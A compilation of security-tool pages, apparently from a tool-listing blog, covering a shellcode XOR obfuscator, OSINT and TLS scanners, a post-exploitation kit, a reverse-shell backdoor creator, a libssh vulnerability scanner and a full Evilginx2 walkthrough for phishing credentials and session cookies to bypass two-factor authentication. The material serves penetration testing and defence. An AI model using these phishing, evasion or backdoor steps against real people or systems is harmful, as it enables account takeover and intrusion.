Shellcode-Encrypter-Decrypter : Shellcode Encrypter & Decrypter by using XOR Cipher

Shellcode-Encrypter-Decrypter encrypts and decrypts shellcode with an XOR cipher. The same key and the same XOR pass are used in both directions, so "decryption" is simply the encryption run a second time.

Shellcode-Encrypter-Decrypter Installation

git clone https://github.com/blacknbunny/Shellcode-Encrypter-Decrypter.git && cd Shellcode-Encrypter-Decrypter/

python enc.py --help


Usage Example

Encryption:
    python encdecshellcode.py --shellcode '\x41\x41\x42\x42' --key SECRETKEY --option encrypt
Decryption:
    python encdecshellcode.py --shellcode '\x12\x04\x01\x10' --key SECRETKEY --option decrypt

Quote the shellcode argument when typing it into a shell; an unquoted \x41 reaches the script as x41 because the shell consumes the backslash. Decryption takes the encrypted bytes, not the original shellcode, as input.

Help

usage: enc.py [-h] [-s SHELLCODE] [-k KEY] [-o OPTION]

Encrypting & Decrypting Shellcode

optional arguments:
  -h, --help            show this help message and exit
  -s SHELLCODE, --shelcode SHELCODE
                        Shellcode To Encrypt & Decrypt
  -k KEY, --key KEY     Key Of The Shellcode To Encrypt & Decrypt
  -o OPTION, --option OPTION
                        Argument For Encrypting & Decrypting Shellcode
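The following is an added example, not the project's own code, showing what the tool does under the hood and two checks a practitioner should run on the result. It XORs the shellcode with a repeating key (the same call encrypts and decrypts), scans the output for null bytes (a null appears wherever a shellcode byte equals the key byte at that position, which breaks string-based loaders), and shows why repeating-key XOR is obfuscation rather than encryption: anyone who knows or guesses as many plaintext bytes as the key is long recovers the key. The sample bytes and key are constructed to match the usage example above.

```python
"""Repeating-key XOR of shellcode, with a bad-byte check and a key-recovery demo."""
import re

ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_escaped(s: str) -> bytes:
    """Convert a '\\x41\\x42' style string (as typed on the command line) to bytes."""
    hexes = ESCAPE_RE.findall(s)
    if len(hexes) * 4 != len(s):
        raise ValueError("expected a string made only of \\xNN escapes")
    return bytes(int(h, 16) for h in hexes)


def to_escaped(b: bytes) -> str:
    """Inverse of parse_escaped: bytes -> '\\x..' string ready to paste into a stub."""
    return "".join(f"\\x{x:02x}" for x in b)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as needed. Calling it again decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))


def null_offsets(blob: bytes) -> list:
    """Offsets of 0x00 bytes in the encrypted blob.

    XOR produces 0x00 wherever the data byte equals the key byte, so the output
    must be re-checked for bad characters before it goes into a loader.
    """
    return [i for i, b in enumerate(blob) if b == 0]


def recover_key(ciphertext: bytes, known_plain: bytes, key_len: int) -> bytes:
    """Known-plaintext attack on repeating-key XOR.

    If an analyst knows (or guesses, e.g. a NOP sled or a standard prologue)
    the first key_len bytes of the shellcode, c ^ p yields the whole key.
    """
    if len(known_plain) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of ciphertext and known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plain[:key_len]))


if __name__ == "__main__":
    # Constructed sample matching the usage example above.
    key = b"SECRETKEY"
    sc = parse_escaped(r"\x41\x41\x42\x42")
    ct = xor_bytes(sc, key)
    print("encrypted:", to_escaped(ct))          # \x12\x04\x01\x10
    assert xor_bytes(ct, key) == sc              # round trip

    # Constructed payload whose first bytes happen to equal the key: nulls appear.
    sc2 = b"SECRET" + b"\x90" * 10
    ct2 = xor_bytes(sc2, key)
    print("null bytes at offsets:", null_offsets(ct2))
    print("key recovered from 9 known plaintext bytes:", recover_key(ct2, sc2, len(key)))
```

The round trip holds for any key, but the last two calls are the point: the encrypted blob needs the same bad-character review as raw shellcode, and the scheme hides the payload from a string scan, not from anyone who can guess a handful of plaintext bytes.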

Twitter-Intelligence : OSINT Project Performs Tracking & Analysis Of The Twitter

Twitter-Intelligence is a project written in Python for Twitter tracking and analysis without using the Twitter API.

  • This project is a Python 3.x application.
  • The package dependencies are listed in requirements.txt. Run the following command to install them:
pip3 install -r requirements.txt
  • SQLite is used as the database.
  • Tweet data are stored in the Tweet, User, Location, Hashtag and HashtagTweet tables.
  • The database is created automatically.


Twitter-Intelligence Usage Example

Application work view:

  • Get help
python3 tracking.py -h
  • Get tweets by username
python3 tracking.py --username "HaberSau"
  • Get tweets by query
python3 tracking.py --query "sakarya"
  • Get tweets in a specific date range
python3 tracking.py --username "HaberSau" --since 2015-09-10 --until 2015-09-12 --maxtweets 10
  • To fetch the location of tweets, add the --location "True" parameter; the application will be slower because of the extra requests.
python3 tracking.py --query "sakarya" --location "True"

Analysis

analysis.py performs the analysis processing. User, hashtag and location analyses are available.

  • Get help:
python3 analysis.py -h
  • Run location analysis:
python3 analysis.py --location

Location analysis is served at http://localhost:5000/locations

You must set a Google Maps API key in setting.py to display the Google map:

GOOGLE_MAP_API_KEY='YOUR_GOOGLE_MAP_API_KEY'

  • Run hashtag analysis:
python3 analysis.py --hashtag
  • Run user analysis:
python3 analysis.py --user

Graphical User Interface

socialgui.py provides the GUI application.

TLS-Scanner : The TLS-Scanner Module from TLS-Attacker

TLS-Scanner is a tool created by the Chair for Network and Data Security from the Ruhr-University Bochum to assist pentesters and security researchers in the evaluation of TLS Server configurations.

Note: It is a research tool intended for TLS developers, pentesters, administrators and researchers. There is no GUI. It is in the first version and may contain some bugs.

Compiling TLS-Scanner

In order to compile and use it, you need to have Java and Maven installed, as well as TLS-Attacker version 2.6.

$ cd TLS-Scanner
$ mvn clean package

Alternatively, if you are in a hurry, you can skip the tests by using:

$ mvn clean package -DskipTests=true

If you want to use it as a library you need to install it with the following command:

$ mvn clean install

For hints on installing the required libraries, check out the corresponding GitHub repositories.

Note: In order to run this tool you need TLS-Attacker version 2.6


Running

In order to run it you need to run the jar file in the apps/ folder.

$ java -jar apps/TLS-Scanner.jar -connect localhost:4433

You can specify a host you want to scan with the -connect parameter. If you want to improve the performance of the scan you can use the -threads parameter (default=1).

Bashark – Bash Pentesters & Security Researchers Post Exploitation Toolkit

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits. To launch it on a compromised host, source the bashark.sh script from a terminal:

$ source bashark.sh

Then type help to see its help menu.

Bashark Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion



Winspy – Windows Reverse Shell Backdoor Creator With An Automatic IP Poisoner

WinSpy is a Windows reverse shell backdoor creator with an automatic IP poisoner.

Dependencies

  • metasploit-framework
  • xterm
  • apache2


Winspy Installation

sudo apt-get install git
git clone https://github.com/TunisianEagles/winspy.git
cd winspy
chmod +x setup.sh
./setup.sh
chmod +x winspy.sh
./winspy.sh


Disclaimer

The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

Credit: Belahsan Ouerghi

ct-exposer : An OSINT Tool That Discovers Sub-Domains By Searching Certificate Transparency Logs

ct-exposer queries the CT logs for a given domain and then performs DNS lookups for the names it finds to see which of them exist in DNS. In my experience so far, I have found numerous sub-domains that were not located with 'site:domain.com' Google searches.

Keep in mind that the domains that do not resolve may be either old domains or internal-only domains (e.g., you need access to the internal DNS server to resolve them).

Certificate Transparency (CT) is an experimental IETF standard. The goal of it was to allow the public to audit which certificates were created by Certificate Authorities (CA). TLS has a weakness that comes from the large list of CAs that your browser implicitly trusts.

If any of those CAs were to maliciously create a new certificate for a domain, your browser would trust it. CT adds benefits to TLS certificate trust: Companies can monitor who is creating certificates for the domains they own.

It also allows browsers to verify that the certificate for a given domain is in the public log record. These logs end up being a gold mine of information for penetration testers and red teams.

ct-exposer Usage

usage: ct-exposer.py [-h] -d DOMAIN [-u] [-m]

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        domain to query for CT logs, ex: domain.com
  -u, --urls            output results with https:// urls for domains that
                        resolve, one per line.
  -m, --masscan         output resolved IP address, one per line. Useful for
                        masscan IP list import "-iL" format.


Example output

python3 ct-exposer.py -d teslamotors.com
[+]: Downloading domain list...
[+]: Download of domain list complete.
[+]: Parsed 76 domain(s) from list.

[+]: Domains found:
205.234.27.243	adfs.teslamotors.com
104.92.115.166	akamaisecure.qualtrics.com
211.147.80.202	cn.auth.teslamotors.com
211.147.88.104	cnvpn.teslamotors.com
209.10.208.24	energystorage.teslamotors.com
209.11.133.110	epc.teslamotors.com
149.14.82.93	euvpn.teslamotors.com
209.11.133.50	extconfl.teslamotors.com
209.11.133.35	extissues.teslamotors.com
209.10.208.31	fleetview.teslamotors.com
64.125.183.134	leaseapp.teslamotors.com
64.125.183.134	leaseappde.teslamotors.com
209.11.133.11	lync.teslamotors.com
211.147.80.201	mycn-origin.teslamotors.com
205.234.27.211	origin-www45.teslamotors.com
205.234.31.120	owner-api.teslamotors.com
12.201.132.70	plcvpn.teslamotors.com
205.234.27.246	quickbase.teslamotors.com
104.86.205.249	resources.teslamotors.com
209.10.208.55	sdlcvpn.teslamotors.com
209.11.133.37	service.teslamotors.com
205.234.27.226	sftp.teslamotors.com
23.227.38.64	shop.eu.teslamotors.com
209.133.79.61	shop.teslamotors.com
23.227.38.64	shop.uk.teslamotors.com
205.234.27.197	smswsproxy.teslamotors.com
209.11.133.36	supercharger.teslamotors.com
209.133.79.59	suppliers.teslamotors.com
209.133.79.61	tesla.com
209.11.133.106	teslamotors.com
205.234.27.200	teslaplm-external.teslamotors.com
209.11.133.107	toolbox.teslamotors.com
209.10.208.20	trt.teslamotors.com
205.234.27.250	upload.teslamotors.com
209.10.208.27	us.auth.teslamotors.com
205.234.27.218	vpn.teslamotors.com
211.147.80.205	wechat.teslamotors.com
205.234.27.212	wsproxy.teslamotors.com
209.133.79.54	www-origin.teslamotors.com
104.86.216.34	www.teslamotors.com
209.11.133.61	xmail.teslamotors.com
211.147.80.203	xmailcn.teslamotors.com

[+]: Domains with no DNS record:
none	cdn02.c3edge.net
none	creditauction.teslamotors.com
none	evprd.teslamotors.com
none	imail.teslamotors.com
none	jupytersvn.teslamotors.com
none	leadgen.teslamotors.com
none	lockit.teslamotors.com
none	lockpay.teslamotors.com
none	neovi-vpn.teslamotors.com
none	origin-wte.teslamotors.com
none	referral.teslamotors.com
none	resources.tesla.com
none	securemail.teslamotors.com
none	shop.ca.teslamotors.com
none	shop.no.teslamotors.com
none	sip.teslamotors.com
none	sjc04p2staap04.teslamotors.com
none	sling.teslamotors.com
none	tesla3dx.teslamotors.com
none	testimail.teslamotors.com
none	toolbox-energy.teslamotors.com
none	vpn-node0.teslamotors.com
none	wd.s3.teslamotors.com
none	www-uat2.teslamotors.com
none	www45.teslamotors.com

Munin – Online Hash Checker For Virustotal & Other Services

Munin is an online hash checker utility that retrieves valuable information about a hash from various online sources.

The current version of Munin queries the following services:

  • Virustotal
  • Malshare
  • HybridAnalysis

Note: Munin is based on the script "VT-Checker", which has been maintained in the LOKI repository.

Munin Usage

usage: munin.py [-h] [-f path] [-c cache-db] [-i ini-file] [-s sample-folder]
                [--comment] [-p vt-comment-prefix] [--download]
                [-d download_path] [--nocache] [--intense] [--retroverify]
                [-r num-results] [--nocsv] [--verifycert] [--sort] [--debug]

Online Hash Checker

optional arguments:
  -h, --help            show this help message and exit
  -f path               File to process (hash line by line OR csv with hash in
                        each line - auto-detects position and comment)
  -c cache-db           Name of the cache database file (default: vt-hash-
                        db.pkl)
  -i ini-file           Name of the ini file that holds the API keys
  -s sample-folder      Folder with samples to process
  --comment             Posts a comment for the analysed hash which contains
                        the comment from the log line
  -p vt-comment-prefix  Virustotal comment prefix
  --download            Enables Sample Download from Hybrid Analysis. SHA256
                        of sample needed.
  -d download_path      Output Path for Sample Download from Hybrid Analysis.
                        Folder must exist
  --nocache             Do not use cache database file
  --intense             Do use PhantomJS to parse the permalink (used to
                        extract user comments on samples)
  --retroverify         Check only 40 entries with the same comment and
                        the rest at the end of the run (retrohunt verification)
  -r num-results        Number of results to take as verification
  --nocsv               Do not write a CSV with the results
  --verifycert          Verify SSL/TLS certificates
  --sort                Sort the input lines (useful for VT retrohunt results)
  --debug               Debug output


Features

  • MODE A: Extracts hashes from any text file based on regular expressions
  • MODE B: Walks sample directory and checks hashes online
  • Retrieves valuable information from Virustotal via API (JSON response) and other information via permalink (HTML parsing)
  • Keeps a history (cache) to query the services only once for a hash that may appear multiple times in the text file
  • Cached objects are stored in JSON
  • Creates CSV file with the findings for easy post-processing and reporting
  • Appends results to a previous CSV if available

Displays

  • Hash and comment (comment is the rest of the line of which the hash has been extracted)
  • AV vendor matches based on a user defined list
  • Filenames used in the wild
  • PE information like the description, the original file name and the copyright statement
  • Signer of a signed portable executable
  • Result based on Virustotal ratio
  • First and last submission
  • Tags for certain indicators: Harmless, Signed, Expired, Revoked, MSSoftware

Extra Checks

  • Queries Malshare.com for sample uploads
  • Queries Hybrid-Analysis.com for present analysis
  • Imphash duplicates in the current batch, which lets you spot overlaps in import table hashes

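The following is an added example, not Munin's code, covering the Features and Extra Checks passages above: pulling MD5/SHA1/SHA256 values out of arbitrary text lines while keeping the rest of the line as the comment (MODE A), querying a lookup backend only once per hash through a cache, and flagging imphash overlaps within a batch. The two input hashes are those of the EICAR test file; the lookup results, imphashes and log lines are constructed, and no online service is contacted.

```python
"""Hash extraction, cached lookups and imphash overlap detection, Munin-style."""
import re
from collections import defaultdict
from typing import Callable, Dict, List, Tuple

# Longest alternative first so a SHA256 is not reported as an embedded MD5/SHA1.
HASH_RE = re.compile(r"\b([0-9a-fA-F]{64}|[0-9a-fA-F]{40}|[0-9a-fA-F]{32})\b")

# Constructed log lines; the hashes are the EICAR test file's MD5 and SHA256.
SAMPLE_LINES = """\
2018-10-01 10:02 dropper.exe 44d88612fea8a8f36de82e1278abb02f # EICAR md5
2018-10-01 10:05 loader.dll  275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f
2018-10-01 10:09 dropper.exe 44d88612fea8a8f36de82e1278abb02f seen again on host B
# no hash on this line
""".splitlines()


def extract_hashes(lines: List[str]) -> List[Tuple[str, str]]:
    """(hash, comment) per line; the comment is the line with the hash removed."""
    out = []
    for line in lines:
        m = HASH_RE.search(line)
        if not m:
            continue
        comment = " ".join((line[:m.start()] + line[m.end():]).split())
        out.append((m.group(1).lower(), comment))
    return out


class CachedLookup:
    """Ask the backend once per hash; repeated hashes are served from the cache."""

    def __init__(self, backend: Callable[[str], dict]):
        self.backend = backend
        self.cache: Dict[str, dict] = {}
        self.backend_calls = 0

    def query(self, h: str) -> dict:
        if h not in self.cache:
            self.backend_calls += 1
            self.cache[h] = self.backend(h)
        return self.cache[h]


def imphash_duplicates(results: Dict[str, dict]) -> Dict[str, List[str]]:
    """imphash -> sorted hashes sharing it, for groups with more than one member."""
    groups = defaultdict(list)
    for h, info in results.items():
        if info.get("imphash"):
            groups[info["imphash"]].append(h)
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def fake_backend(h: str) -> dict:
    """Stand-in for the online services (constructed data, not real results)."""
    shared_imphash = "0123456789abcdef0123456789abcdef"
    table = {
        "44d88612fea8a8f36de82e1278abb02f": {"positives": 60, "imphash": shared_imphash},
        "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f":
            {"positives": 62, "imphash": shared_imphash},
    }
    return table.get(h, {"positives": None, "imphash": None})


def run_batch(lines: List[str], backend: Callable[[str], dict] = fake_backend):
    """Extract, look up through the cache, and report imphash overlaps."""
    lookup = CachedLookup(backend)
    results: Dict[str, dict] = {}
    for h, comment in extract_hashes(lines):
        results[h] = dict(lookup.query(h), comment=comment)   # last comment wins
    return results, lookup.backend_calls, imphash_duplicates(results)


if __name__ == "__main__":
    results, calls, dups = run_batch(SAMPLE_LINES)
    print(f"{len(results)} unique hashes, {calls} backend calls")
    for h, info in results.items():
        print(h, info["positives"], "|", info["comment"])
    print("imphash overlaps:", dups)
```

Three hashes are extracted from the sample but only two backend calls are made, which is the cache doing its job against the per-request limits of the public APIs, and the two files are reported as sharing an import table hash even though their file hashes differ.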
Typical Command Lines

Process a Virustotal Retrohunt result and sort the lines before checking so that matched signatures are checked in blocks (the ini file holding the API keys is passed with -i, as in the help text above):

python munin.py -i my.ini -f ~/Downloads/retro_hunt --sort

Process an IOC file and show who commented on these samples on Virustotal (uses PhantomJS, higher CPU usage):

python munin.py -i my.ini -f ~/Downloads/misp-event-1234.csv --sort --intense

Process a directory with samples and check their hashes online:

python munin.py -i my.ini -s ~/malware/case34

Get the API Keys used by Munin

Virustotal

  1. Create an account here https://www.virustotal.com/#/join-us
  2. Check Profile > My API key for your public API key

Malshare

Register here https://malshare.com/register.php

Hybrid Analysis

  1. Create an account here https://www.hybrid-analysis.com/signup
  2. After login, check Profile > API key


Libssh-Scanner : Script to identify hosts vulnerable to CVE-2018-10933

Libssh-Scanner is a Python script that identifies hosts vulnerable to CVE-2018-10933, an authentication bypass in libssh's server-side code. It has two modes: passive (banner grabbing) and aggressive (attempting the authentication bypass) to validate that the vulnerability actually exists. By default it uses passive mode; supply the -a argument to use aggressive mode, which gives more accurate results because a banner only shows which libssh build is running.


Libssh-Scanner Installation

Within the cloned libssh-scanner directory, run:

pip install -r requirements.txt

Help

libssh Scanner - Find vulnerable libssh services by Leap Security (@LeapSecurity)

positional arguments:
  target                An ip address or new line delimited file containing
                        IPs to search for the vulnerability.

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -p PORT, --port PORT  Set port of SSH service
  -a, --aggressive      Identify vulnerable hosts by bypassing authentication
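The following is an added example, not Libssh-Scanner's code, implementing the passive mode described above. It reads the identification string an SSH server sends first (RFC 4253, section 4.2), extracts the libssh version and compares it against the affected ranges of CVE-2018-10933: 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3, fixed in 0.7.6 and 0.8.4. The banners below are constructed. The check is deliberately conservative: a matching banner means "likely vulnerable", since the banner does not prove the bypass works (the aggressive mode exists for that), and a distribution may have backported the fix without changing the version string.

```python
"""Passive banner check for CVE-2018-10933 (libssh server authentication bypass)."""
import re
import socket
from typing import Optional, Tuple

# Accepts "libssh_0.7.4" and "libssh-0.7.4" style version strings.
BANNER_RE = re.compile(r"^SSH-2\.0-libssh[_-]?(\d+)\.(\d+)\.(\d+)", re.IGNORECASE)

# Constructed banners covering both edges of the affected ranges.
SAMPLE_BANNERS = [
    "SSH-2.0-libssh_0.7.4",
    "SSH-2.0-libssh_0.8.3",
    "SSH-2.0-libssh_0.8.4",
    "SSH-2.0-libssh-0.6.0",
    "SSH-2.0-libssh_0.5.5",
    "SSH-2.0-OpenSSH_7.4",
]

Version = Tuple[int, int, int]


def parse_libssh_version(banner: str) -> Optional[Version]:
    """(major, minor, patch) from a libssh banner, or None for other servers."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable_version(v: Version) -> bool:
    """Affected: 0.6.0 <= v <= 0.7.5 or 0.8.0 <= v <= 0.8.3."""
    return (0, 6, 0) <= v <= (0, 7, 5) or (0, 8, 0) <= v <= (0, 8, 3)


def classify(banner: str) -> str:
    v = parse_libssh_version(banner)
    if v is None:
        return "not libssh"
    return "likely vulnerable" if is_vulnerable_version(v) else "patched or unaffected"


def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Read the server's identification string; the server sends it first.

    RFC 4253 lets the server send other lines before the "SSH-" line, so skip
    anything that does not start with it. Returns "" if none arrives.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        for _ in range(20):
            line = f.readline(255)
            if not line:
                break
            if line.startswith(b"SSH-"):
                return line.decode("ascii", "replace").strip()
    return ""


if __name__ == "__main__":
    for b in SAMPLE_BANNERS:
        print(f"{b:28} -> {classify(b)}")
    # Live use: print(classify(grab_banner("192.0.2.1", 22)))
```

Run against a real host, grab_banner plus classify reproduces the tool's passive output; the aggressive mode on the page is the step that turns "likely vulnerable" into a confirmed finding.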

Evilginx2 – Standalone MITM Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-factor Authentication

Evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows bypassing 2-factor authentication: the victim completes the second factor against the real site, and the attacker keeps the resulting session cookie.

This tool is a successor to Evilginx, released in 2017, which used a custom version of the nginx HTTP server to provide man-in-the-middle functionality and act as a proxy between a browser and the phished website. The present version is fully written in Go as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.

Evilginx2 Installation

You can either use a precompiled binary package for your architecture or you can compile evilginx2 from source. You will need an external server where you’ll host your evilginx2 installation.

Evilginx runs very well on the most basic Debian 8 VPS.


Installing from source

In order to compile from source, make sure you have installed Go version 1.10.0 or later (get it from here) and that the $GOPATH environment variable is set up properly (default: $HOME/go).

After installation, add this to your ~/.profile, assuming that you installed GO in /usr/local/go:

export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Then load it with source ~/.profile.

Now you should be ready to install evilginx2. Follow these instructions:

sudo apt-get install git make
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make

You can now either run evilginx2 from local directory like:

sudo ./bin/evilginx -p ./phishlets/

or install it globally:

sudo make install
sudo evilginx

Instructions above can also be used to update evilginx2 to the latest version.

Installing with Docker

You can launch evilginx2 from within Docker. First build the container:

docker build . -t evilginx2

Then you can run the container:

docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Phishlets are loaded within the container at /app/phishlets, which can be mounted as a volume for configuration.

Installing from precompiled binary packages

Grab the package you want from here and drop it on your box. Then do:

unzip <package_name>.zip -d <package_name>
cd <package_name>

If you want to do a system-wide install, use the install script with root privileges:

chmod 700 ./install.sh
sudo ./install.sh
sudo evilginx

or just launch evilginx2 from the current directory (you will also need root privileges):

chmod 700 ./evilginx
sudo ./evilginx

Usage

Make sure that there is no service listening on ports TCP 443, TCP 80 and UDP 53. You may need to shutdown apache or nginx and any service used for resolving DNS that may be running. evilginx2 will tell you on launch if it fails to open a listening socket on any of these ports.

By default, evilginx2 will look for phishlets in ./phishlets/ directory and later in /usr/share/evilginx/phishlets/. If you want to specify a custom path to load phishlets from, use the -p <phishlets_dir_path> parameter when launching the tool.

Usage of ./evilginx:
  -debug
        Enable debug output
  -developer
        Enable developer mode (generates self-signed certificates for all hostnames)
  -p string
        Phishlets directory path

You should see evilginx2 logo with a prompt to enter commands. Type help or help <command> if you want to see available commands or more detailed information on them.

Getting started

To get up and running, you need to first do some setting up.

At this point I assume, you’ve already registered a domain (let’s call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider’s admin panel to point to your server’s IP (e.g. 10.0.0.1):

ns1.yourdomain.com = 10.0.0.1
ns2.yourdomain.com = 10.0.0.1

Set up your server’s domain and IP using following commands:

config domain yourdomain.com
config ip 10.0.0.1

Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):

phishlets hostname linkedin my.phishing.hostname.yourdomain.com

And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:

phishlets enable linkedin

Your phishing site is now live. Decide which URL the victim should be redirected to after a successful login, then generate the phishing URL (here the victim is redirected to https://www.google.com):

phishlets get-url linkedin https://www.google.com

Running phishlets only respond to tokenized links, so any scanner that hits your main domain is redirected to the URL set as redirect_url in the config. If you want to hide a phishlet so that it does not respond even to valid tokenized phishing URLs, use the phishlets hide/unhide <phishlet> command.

You can monitor captured credentials and session cookies with:

sessions

To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:

sessions <id>

The captured session cookie can be copied and imported into Chrome browser, using EditThisCookie extension.

If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.

Disclaimer

We are very much aware that Evilginx can be used for nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender’s responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attacks. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Credit: Kuba Gretzky